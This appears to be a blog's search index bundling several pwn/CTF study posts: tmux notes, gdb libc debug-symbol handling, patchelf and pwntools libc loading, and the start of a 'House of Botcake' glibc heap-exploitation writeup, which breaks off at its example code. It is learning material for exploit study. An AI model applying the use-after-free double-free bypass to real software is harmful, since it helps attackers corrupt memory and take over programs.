<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>tmux notes</title>
<link href="/2021/08/08/tmux%E7%AC%94%E8%AE%B0/"/>
<url>/2021/08/08/tmux%E7%AC%94%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="tmux笔记"><a href="#tmux笔记" class="headerlink" title="tmux笔记"></a>tmux notes</h1><h2 id="Session会话相关"><a href="#Session会话相关" class="headerlink" title="Session会话相关"></a>Sessions</h2><h3 id="命令"><a href="#命令" class="headerlink" title="命令"></a>Commands</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Create a new session:</span><br>tmux [new -s session-name -n window-name]<br><br><span class="hljs-comment"># Attach to a session:</span><br>tmux attach(at) [-t session-name]<br><br><span class="hljs-comment"># Detach from the session</span><br>tmux detach<br><br><span class="hljs-comment"># List sessions:</span><br>tmux <span class="hljs-built_in">ls</span><br>tmux list-session<br><br><span class="hljs-comment"># Switch session</span><br>tmux switch [-t session-name]<br><br><span class="hljs-comment"># Rename a session</span><br>tmux rename-session -t 0 <new-name><br><br><span class="hljs-comment"># Kill a session:</span><br>tmux kill-session [-t session-name]<br><br><span class="hljs-comment"># Kill all sessions:</span><br>tmux <span class="hljs-built_in">ls</span> | grep : | <span class="hljs-built_in">cut</span> -d. -f1 | awk <span class="hljs-string">'{print substr($1, 0, length($1)-1)}'</span> | xargs -I{} tmux kill-session -t {}<br></code></pre></td></tr></table></figure>
<h3 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>Shortcuts</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sh">prefix :new<cr>  start a new session<br>prefix s  list all sessions<br>prefix $  rename the current session<br>prefix d  exit tmux (tmux keeps running in the background)<br></code></pre></td></tr></table></figure>
<h2 id="Windows窗口相关"><a href="#Windows窗口相关" class="headerlink" title="Windows窗口相关"></a>Windows</h2><h3 id="命令-1"><a href="#命令-1" class="headerlink" title="命令"></a>Commands</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Create a new window</span><br>tmux new-window<br><br><span class="hljs-comment"># Create a new window with a given name</span><br>tmux new-window -n <window-name><br><br><span class="hljs-comment"># Switch to the window with the given number</span><br>tmux select-window -t <window-number><br><br><span class="hljs-comment"># Switch to the window with the given name</span><br>tmux select-window -t <window-name><br><br><span class="hljs-comment"># Swap windows 3 and 1</span><br>tmux swap-window -s 3 -t 1<br><br><span class="hljs-comment"># Swap the current window with window 1</span><br>tmux swap-window -t 1<br><br><span class="hljs-comment"># Move the current window to number 1</span><br>tmux move-window -t 1<br><br><span class="hljs-comment"># Rename the window</span><br>tmux rename-window <new-name><br></code></pre></td></tr></table></figure>
<h3 id="快捷键-1"><a href="#快捷键-1" class="headerlink" title="快捷键"></a>Shortcuts</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Adjust window order</span><br>prefix c  create a new window<br>prefix w  list all windows<br>prefix n  next window<br>prefix p  previous window<br>prefix f  find a window<br>prefix ,  rename the current window<br>prefix &  close the current window<br>prefix <number>  switch to the window with the given number<br></code></pre></td></tr></table></figure>
<h2 id="Panes窗格相关"><a href="#Panes窗格相关" class="headerlink" title="Panes窗格相关"></a>Panes</h2><h3 id="命令-2"><a href="#命令-2" class="headerlink" title="命令"></a>Commands</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Move the current pane up</span><br>tmux swap-pane -U<br><span class="hljs-comment"># Move the current pane down</span><br>tmux swap-pane -D<br><br><span class="hljs-comment"># Split into top and bottom panes</span><br>tmux split-window<br><br><span class="hljs-comment"># Split into left and right panes</span><br>tmux split-window -h<br></code></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Move the cursor to the pane above</span><br>tmux select-pane -U<br><br><span class="hljs-comment"># Move the cursor to the pane below</span><br>tmux select-pane -D<br><br><span class="hljs-comment"># Move the cursor to the pane on the left</span><br>tmux select-pane -L<br><br><span class="hljs-comment"># Move the cursor to the pane on the right</span><br>tmux select-pane -R<br></code></pre></td></tr></table></figure>
<h3 id="快捷键-2"><a href="#快捷键-2" class="headerlink" title="快捷键"></a>Shortcuts</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Synchronize panes</span><br>prefix :setw synchronize-panes<br></code></pre></td></tr></table></figure><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Resize panes</span><br>prefix :resize-pane -D  grow the current pane downward by 1 cell<br>prefix :resize-pane -U  grow the current pane upward by 1 cell<br>prefix :resize-pane -L  grow the current pane to the left by 1 cell<br>prefix :resize-pane -R  grow the current pane to the right by 1 cell<br><br>prefix :resize-pane [-t N -L M]  grow pane number N to the left by M cells<br></code></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs shell">prefix %  split into left and right panes<br>prefix "  split into top and bottom panes<br>prefix <arrow key>  move the cursor to another pane<br>prefix ;  move the cursor to the previous pane<br>prefix o  move the cursor to the next pane<br>prefix {  swap the current pane with the previous pane<br>prefix }  swap the current pane with the next pane<br>prefix Ctrl+o  move all panes forward one position; the first pane becomes the last<br>prefix Alt+o  move all panes backward one position; the last pane becomes the first<br>prefix x  close the current pane<br>prefix !  break the current pane out into a separate window<br>prefix z  show the current pane full screen; using it again restores the original size<br>prefix Ctrl+<arrow key>  resize the pane in the direction of the arrow<br>prefix q  show pane numbers<br></code></pre></td></tr></table></figure>
<h2 id="杂项"><a href="#杂项" class="headerlink" title="杂项"></a>Miscellaneous</h2><h3 id="命令-3"><a href="#命令-3" class="headerlink" title="命令"></a>Commands</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># List all key bindings and their corresponding tmux commands</span><br>tmux list-keys<br><br><span class="hljs-comment"># List all tmux commands and their arguments</span><br>tmux list-commands<br><br><span class="hljs-comment"># List information about all current tmux sessions</span><br>tmux info<br><br><span class="hljs-comment"># Reload the current tmux configuration</span><br>tmux source-file ~/.tmux.conf<br><br><span class="hljs-comment"># Exit</span><br><span class="hljs-built_in">exit</span>  <span class="hljs-comment"># or press Ctrl+d</span><br></code></pre></td></tr></table></figure>
<h3 id="快捷键-3"><a href="#快捷键-3" class="headerlink" title="快捷键"></a>Shortcuts</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sh">prefix t  show a digital clock in the centre of the window<br>prefix ?  list all key bindings<br>prefix :  command prompt<br></code></pre></td></tr></table></figure>
<h2 id="配置选项"><a href="#配置选项" class="headerlink" title="配置选项"></a>Configuration options</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># Mouse support: set to on to enable the mouse (this differs in versions before 2.1; consult the man page)</span><br><span class="hljs-built_in">set</span> -g mouse on<br><br><span class="hljs-comment"># Set the default terminal mode to 256color</span><br><span class="hljs-built_in">set</span> -g default-terminal <span class="hljs-string">"screen-256color"</span><br><br><span class="hljs-comment"># Enable activity alerts</span><br>setw -g monitor-activity on<br><span class="hljs-built_in">set</span> -g visual-activity on<br><br><span class="hljs-comment"># Centre the window list</span><br><span class="hljs-built_in">set</span> -g status-justify centre<br><br><span class="hljs-comment"># Maximize/restore a pane</span><br>unbind Up<br><span class="hljs-built_in">bind</span> Up new-window -d -n tmp \; swap-pane -s tmp.1 \; select-window -t tmp<br>unbind Down<br><span class="hljs-built_in">bind</span> Down last-window \; swap-pane -s tmp.1 \; kill-window -t tmp<br><br><span class="hljs-comment"># Text copy mode</span><br>setw -g mode-keys vi<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>tmux</tag>
</tags>
</entry>
<entry>
<title>Questions and understanding about debugging libc with source in gdb</title>
<link href="/2021/08/06/%E5%85%B3%E4%BA%8Egdb%E5%B8%A6%E6%BA%90%E7%A0%81%E8%B0%83%E8%AF%95libc%E7%9A%84%E9%97%AE%E9%A2%98%E5%92%8C%E7%90%86%E8%A7%A3/"/>
<url>/2021/08/06/%E5%85%B3%E4%BA%8Egdb%E5%B8%A6%E6%BA%90%E7%A0%81%E8%B0%83%E8%AF%95libc%E7%9A%84%E9%97%AE%E9%A2%98%E5%92%8C%E7%90%86%E8%A7%A3/</url>
<content type="html"><![CDATA[<h1 id="关于gdb带源码调试libc的问题和理解"><a href="#关于gdb带源码调试libc的问题和理解" class="headerlink" title="关于gdb带源码调试libc的问题和理解"></a>Questions and understanding about debugging libc with source in gdb</h1><hr><h2 id="问题"><a href="#问题" class="headerlink" title="问题"></a>Questions</h2><ol><li><p>dpkg -L libc6-dbg shows that the files are placed in the folder shown in the image below; how does gdb locate them?<br> <img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806033728.png"></p></li><li><p>pwndbg automatically loads the symbol information of the libc.so with symbols under the .debug folder; if the folder is renamed to debug, it is not loaded.<br> <img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806034111.png"></p></li><li><p>After adding the file with add-symbol-file, it cannot be used.<img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806035100.png"></p></li><li><p>Why can't libc.so simply be set to the version of libc with symbols? As shown in glibc-all-in-one, you need the libc without symbols plus the debug information with symbols placed in the .debug folder.</p></li></ol><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806035706.png"></p><hr>
<h2 id="解答"><a href="#解答" class="headerlink" title="解答"></a>Answers</h2><ol><li><p>How gdb locates symbols</p><p>For the debug link method:</p><p>If nothing is found in the executable's directory, gdb looks in a subdirectory of the global debug directory.</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134223.png"></p><p>As shown in the image, the subdirectory currently searched is /usr/lib/debug/(pwd) (the executable's directory)/debug link file name.</p></li><li><p>For the debug link method:</p><p>gdb first looks in the current directory; if nothing is found there it tries the .debug directory, and finally the global directory.</p></li><li><p>This is unclear for now; it may be related to pwndbg. The imported structs and the like do become usable, though.</p></li><li><p>Because the symbol file only contains symbol information; its .text section has no content.</p><p>objdump -d -j .text xxx</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134717.png"></p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134828.png"></p></li></ol><hr>
<h2 id="对于符号和调试信息的深入理解"><a href="#对于符号和调试信息的深入理解" class="headerlink" title="对于符号和调试信息的深入理解"></a>A deeper understanding of symbols and debug information</h2><h3 id="gdb寻找符号的方式"><a href="#gdb寻找符号的方式" class="headerlink" title="gdb寻找符号的方式"></a>How gdb finds symbols</h3><p>gdb supports two ways of finding symbol files<sup id="fnref:1" class="footnote-ref"><a href="#fn:1" rel="footnote"><span class="hint--top hint--rounded" aria-label="https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html">[1]</span></a></sup>:</p><ul><li>By build-id, searching the paths specified by the system</li><li>By the debug-link section in the executable, searching the current directory</li></ul>
<h3 id="查看和修改debug-link节"><a href="#查看和修改debug-link节" class="headerlink" title="查看和修改debug-link节"></a>Viewing and modifying the debug-link section</h3><p>objcopy can be used to modify the contents of the debug-link section in the libc file so that it points to the dbg file we need.</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806135408.png"></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">objcopy <span class="hljs-literal">--remove-section</span>=.gnu_debuglink libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so<br><span class="hljs-comment"># The command above first removes the existing debuglink section; the one below adds the new link</span><br>objcopy <span class="hljs-literal">--add-gnu-debuglink</span>=libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so.debug libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so<br></code></pre></td></tr></table></figure>
<h3 id="查看符号信息nm"><a href="#查看符号信息nm" class="headerlink" title="查看符号信息nm"></a>Viewing symbol information with nm</h3><blockquote><p>nm -a: view symbol information, including debug information</p><p>nm: view symbol information</p><p>nm -D: view only dynamic-link symbols</p></blockquote><h3 id="判断一个文件是否有debug信息"><a href="#判断一个文件是否有debug信息" class="headerlink" title="判断一个文件是否有debug信息"></a>Determining whether a file has debug information</h3><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820191018160310264.png"></p>
<h3 id="debug信息的分离和合并以及使用"><a href="#debug信息的分离和合并以及使用" class="headerlink" title="debug信息的分离和合并以及使用"></a>Separating, merging and using debug information</h3><h4 id="分离"><a href="#分离" class="headerlink" title="分离"></a>Separating</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">objcopy --only-keep-debug main main.debug  # write the debug information to main.debug<br><br>objcopy --strip-debug main<br>strip --strip-debug --strip-unneeded main<br><br>objcopy --add-gnu-debuglink=main.debug main  # record main.debug in main's .gnu_debuglink section<br></code></pre></td></tr></table></figure><h4 id="合并"><a href="#合并" class="headerlink" title="合并"></a>Merging</h4><p>Use eu-unstrip, a tool from the elfutils package.</p><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit">eu-unstrip <span class="hljs-built_in">binary</span> <span class="hljs-built_in">binary</span>.dbg<br></code></pre></td></tr></table></figure><h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a>Using</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">gdb -s main.debug -e main<br></code></pre></td></tr></table></figure>
<h3 id="什么是符号,符号包括哪些类型?"><a href="#什么是符号,符号包括哪些类型?" class="headerlink" title="什么是符号,符号包括哪些类型?"></a>What is a symbol, and what types of symbols are there?</h3><p>To be added</p><h3 id="debug信息中包含什么东西?"><a href="#debug信息中包含什么东西?" class="headerlink" title="debug信息中包含什么东西?"></a>What does debug information contain?</h3><p>To be added</p><h3 id="dwarf是什么文件?"><a href="#dwarf是什么文件?" class="headerlink" title="dwarf是什么文件?"></a>What kind of file is dwarf?</h3><p>To be added</p><hr>
<h2 id="相关内容"><a href="#相关内容" class="headerlink" title="相关内容"></a>Related content</h2><ol><li><a href="https://www.jianshu.com/p/1a966b62b3d4">Using an older glibc version with debug symbols</a></li><li><a href="https://xuanxuanblingbling.github.io/ctf/tools/2020/03/20/gdb/">Debugging libc with source in gdb</a></li><li><a href="https://ephrain.net/gdb-%E8%BC%89%E5%85%A5%E6%9F%90%E5%80%8B-library-%E7%9A%84-symbol-file/">Loading the symbol file of a library</a></li><li><a href="https://www.jianshu.com/p/7a1441e4f355">Making sig files with IDA && importing a symbol table into gdb</a></li><li><a href="https://stackoverflow.com/questions/59913495/gdb-wont-load-shared-libs-symbols-not-even-libc-so-musl-when-loading-a-core">gdb-wont-load-shared-libs-symbols-not-even-libc-so-musl-when-loading-a-core</a></li><li><a href="http://www.360doc.com/content/20/0609/16/38701044_917408462.shtml">Debugging a program whose binary and symbol table are separated with GDB</a></li><li><a href="https://www.cnblogs.com/amethyst623/articles/1946499.html">Object file format analysis tools</a></li></ol><section class="footnotes"><h2>References</h2><div class="footnote-list"><ol><li><span id="fn:1" class="footnote-text"><span><a href="https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html">https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html</a><a href="#fnref:1" rev="footnote" class="footnote-backref"> ↩</a></span></span></li></ol></div></section>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>Loading a specified libc for an ELF file</title>
<link href="/2021/08/05/ELF%E6%96%87%E4%BB%B6%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9Alibc/"/>
<url>/2021/08/05/ELF%E6%96%87%E4%BB%B6%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9Alibc/</url>
<content type="html"><![CDATA[<h1 id="ELF文件加载指定libc"><a href="#ELF文件加载指定libc" class="headerlink" title="ELF文件加载指定libc"></a>Loading a specified libc for an ELF file</h1><hr><h2 id="使用工具"><a href="#使用工具" class="headerlink" title="使用工具"></a>Tools used</h2><ul><li><p>patchelf</p><ul><li><a href="https://github.com/NixOS/patchelf">https://github.com/NixOS/patchelf</a></li><li>Patches the file; mainly used to change the ld path hard-coded in the ELF file. The libc load path, by contrast, can be changed with the LD_PRELOAD environment variable.</li></ul></li><li><p>glibc-all-in_one</p><ul><li><a href="https://github.com/matrix1001/glibc-all-in-one">https://github.com/matrix1001/glibc-all-in-one</a></li><li>Mainly used to download a specified libc version together with its debug files. You can also use its extract script to extract from a deb yourself; just make sure the files extracted from the dbg deb are placed in .debug.</li><li>There are also other ways to debug libc with source:<ul><li><a href="https://www.jianshu.com/p/ee1ad4044ef7">Using multiple libc versions at once && compiling libc</a></li><li><a href="https://blog.csdn.net/weixin_44164182/article/details/118678610">Loading a specified libc version with pwntools</a></li></ul></li></ul></li></ul><hr>
<h2 id="修改方法"><a href="#修改方法" class="headerlink" title="修改方法"></a>How to modify</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --set-interpreter /lib64/31-linux.so.2 ./a.out<br><br>patchelf --replace-needed libc.so.6 ~/2.31-0ubuntu9_amd64/libc-2.31.so ./a.out<br></code></pre></td></tr></table></figure><p>It can also be specified directly in <code>pwntools</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *  <span class="hljs-comment"># provides gdb, process, ELF, log, success and os</span><br>gdb.debug([<span class="hljs-string">'./ld-2.23.so'</span>, <span class="hljs-string">'./0ctfbabyheap'</span>], <span class="hljs-string">'''</span><br><span class="hljs-string">b __libc_start_main</span><br><span class="hljs-string">c</span><br><span class="hljs-string">'''</span>, env={<span class="hljs-string">'LD_PRELOAD'</span>: <span class="hljs-string">'./libc-2.23.so'</span>})<br><span class="hljs-comment"># The first argument here is argv; this shows that the executable can be ld, with the program actually being run as its argument. In theory process should work the same way.</span><br>process([<span class="hljs-string">"/lib64/ld-linux-x86-64.so.2"</span>,<span class="hljs-string">"./a.out"</span>],env={<span class="hljs-string">'LD_PRELOAD'</span>:<span class="hljs-string">'./libc-2.23.so'</span>})<br><span class="hljs-comment"># Of course, ld can also be changed with a script</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change_ld</span>(<span class="hljs-params">binary, ld</span>):<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.access(ld, os.R_OK):<br>        log.failure(<span class="hljs-string">"Invalid path {} to ld"</span>.<span class="hljs-built_in">format</span>(ld))<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.access(binary, os.R_OK):<br>        log.failure(<span class="hljs-string">"Invalid path {} to binary"</span>.<span class="hljs-built_in">format</span>(binary))<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>    binary = ELF(binary)<br>    path = <span class="hljs-string">'./{}_{}'</span>.<span class="hljs-built_in">format</span>(os.path.basename(binary.path), ld.split(<span class="hljs-string">'.'</span>)[-<span class="hljs-number">2</span>])<br>    <span class="hljs-keyword">if</span> os.access(path, os.F_OK):  <span class="hljs-comment"># drop a stale patched copy; it is rebuilt below</span><br>        os.remove(path)<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">"remove exist file....."</span>)<br>    <span class="hljs-keyword">for</span> segment <span class="hljs-keyword">in</span> binary.segments:<br>        <span class="hljs-keyword">if</span> segment.header[<span class="hljs-string">'p_type'</span>] == <span class="hljs-string">'PT_INTERP'</span>:<br>            size = segment.header[<span class="hljs-string">'p_memsz'</span>]<br>            addr = segment.header[<span class="hljs-string">'p_paddr'</span>]<br>            data = segment.data()<br>            <span class="hljs-keyword">if</span> size <= <span class="hljs-built_in">len</span>(ld):<br>                log.failure(<span class="hljs-string">"Failed to change PT_INTERP from {} to {}"</span>.<br>                            <span class="hljs-built_in">format</span>(data, ld))<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>            binary.write(addr, ld.encode().ljust(size, <span class="hljs-string">b'\x00'</span>))  <span class="hljs-comment"># ELF.write needs bytes on Python 3</span><br>            <span class="hljs-keyword">break</span><br>    binary.save(path)<br>    os.chmod(path, <span class="hljs-number">0b111000000</span>) <span class="hljs-comment">#rwx------</span><br>    success(<span class="hljs-string">"PT_INTERP has changed from {} to {}. Using temp file {}"</span>.<span class="hljs-built_in">format</span>(data, ld, path))<br>    <span class="hljs-keyword">return</span> ELF(path)<br></code></pre></td></tr></table></figure>
<p>Note that LD_PRELOAD does not take effect for setuid programs. In addition, when calling the exec family from within a setuid program,</p><p>after <code>fork</code> and before <code>exec*</code>, setting</p><ul><li><code>setreuid</code> to the owner of the set-user-ID program</li><li><code>setregid</code> to the group of the set-group-ID program</li></ul>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>House of Botcake</title>
<link href="/2021/08/05/house_of_botcake/"/>
<url>/2021/08/05/house_of_botcake/</url>
<content type="html"><![CDATA[<h1 id="house-of-Botcake"><a href="#house-of-Botcake" class="headerlink" title="house of Botcake"></a>house of Botcake</h1><hr><h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>Exploitation conditions</h2><p>glibc>=2.26:</p><p>tcache is a mechanism introduced from this version (ubuntu 17.10) onward (<a href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc">commit</a>) to improve heap-management performance. In gaining performance it dropped many security checks, which has given rise to many new exploitation techniques.</p><p>A UAF exists</p><h2 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>How it works</h2><p>Before a chunk is freed into tcache there is no check of the in-use bit (the same goes for fastbin)</p><p>The tcache double-free check is bypassed through unsorted bin consolidation</p><h2 id="利用示例"><a href="#利用示例" class="headerlink" title="利用示例"></a>Exploitation example</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span 
class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span 
